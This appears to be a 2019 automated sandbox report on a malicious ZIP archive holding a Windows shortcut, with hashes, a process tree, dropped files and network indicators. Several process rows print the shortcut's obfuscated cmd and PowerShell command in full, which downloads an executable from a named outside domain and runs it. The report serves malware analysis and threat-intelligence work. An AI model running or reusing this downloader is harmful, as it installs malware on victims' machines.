download: | uc |
Full analysis: | https://app.any.run/tasks/4f64eb61-4de3-406b-9ada-f27ef6a8e940 |
Verdict: | Malicious activity |
Analysis date: | May 20, 2019, 19:31:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | C8AB704860262CF0F2847C63FCC225D9 |
SHA1: | D68025B31533A01CA3F3D343B933C70E832C4F07 |
SHA256: | 79A36E047A126AA832BFAA6579602A840E1AFECB29A51207ECEDB79E130D68A0 |
SSDEEP: | 3072:8XANmZO3D55ZYnKtWf6Rv0S5AbGZYJDlejEjC+eNdhr13aL:8LOHZT5R0S4JJjb6dj3i |
.zip | | | ZIP compressed archive (100) |
---|
ZipRequiredVersion: | 20 |
---|---|
ZipBitFlag: | 0x0808 |
ZipCompression: | Deflated |
ZipModifyDate: | 2019:05:20 16:31:08 |
ZipCRC: | 0xebd6ae7b |
ZipCompressedSize: | 141728 |
ZipUncompressedSize: | 157902 |
ZipFileName: | GFHN-939742408.lnk |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2944 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\uc.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
User: admin Company: Alexander Roshal Integrity Level: MEDIUM Description: WinRAR archiver Version: 5.60.0 | ||||
2480 | "C:\Windows\System32\cmd.exe" /C set o=HttPs:/&powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');"&"C:\Program Files\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.syS&C:\Users\admin\AppData\Local\Temp/d&J34HH&E34JSH_d+&df | C:\Windows\System32\cmd.exe | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3744 | powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3080 | "C:\Windows\System32\cmd.exe" /C set o=HttPs:/&powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');"&"C:\Program Files\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.syS&C:\Users\admin\AppData\Local\Temp/d&J34HH&E34JSH_d+&df | C:\Windows\System32\cmd.exe | — | WinRAR.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3240 | powershEll "$sd=new-object system.nEt.weBcliEnt;$sd.doWnloAdfIle($env:o+'/www.braintrainersuk.com/ONOLTDA-GD.exe',$env:tmp+'\D.exe');" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 1 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1344 | "C:\Program Files\wiNDows nt\accESsorIes\wORdpaD" c:\pagefIle.syS | C:\Program Files\wiNDows nt\accESsorIes\wordpad.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Wordpad Application Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3744 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\15VYHDPPH7ZLXGQ0OGNN.temp | — | |
MD5:— | SHA256:— | |||
3240 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\64226SED4W08VNZI3ZAE.temp | — | |
MD5:— | SHA256:— | |||
2944 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\uc\GFHN-939742408.lnk | lnk | |
MD5:FF6C572659CA5E8ADEAE1167621C8FCF | SHA256:6B01D5A21BA03D9147177E5CA70F3F5BC0CF1894A860E8D3EFA4FC5AAAD4B2FD | |||
3240 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3240 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF12edd3.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2944 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa2944.20410\GFHN-939742408.lnk | lnk | |
MD5:FF6C572659CA5E8ADEAE1167621C8FCF | SHA256:6B01D5A21BA03D9147177E5CA70F3F5BC0CF1894A860E8D3EFA4FC5AAAD4B2FD | |||
3744 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
3744 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF124435.TMP | binary | |
MD5:16D0FD6E07266B2C15A9D7BC6623F506 | SHA256:833367DC50386D139010182CEDE41B4D055F8D463626EC4005652528B3E0871B | |||
2944 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIa2944.24749\GFHN-939742408.lnk | lnk | |
MD5:FF6C572659CA5E8ADEAE1167621C8FCF | SHA256:6B01D5A21BA03D9147177E5CA70F3F5BC0CF1894A860E8D3EFA4FC5AAAD4B2FD |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3744 | powershell.exe | 68.66.248.28:443 | www.braintrainersuk.com | A2 Hosting, Inc. | US | suspicious |
Domain | IP | Reputation |
---|---|---|
www.braintrainersuk.com |
| malicious |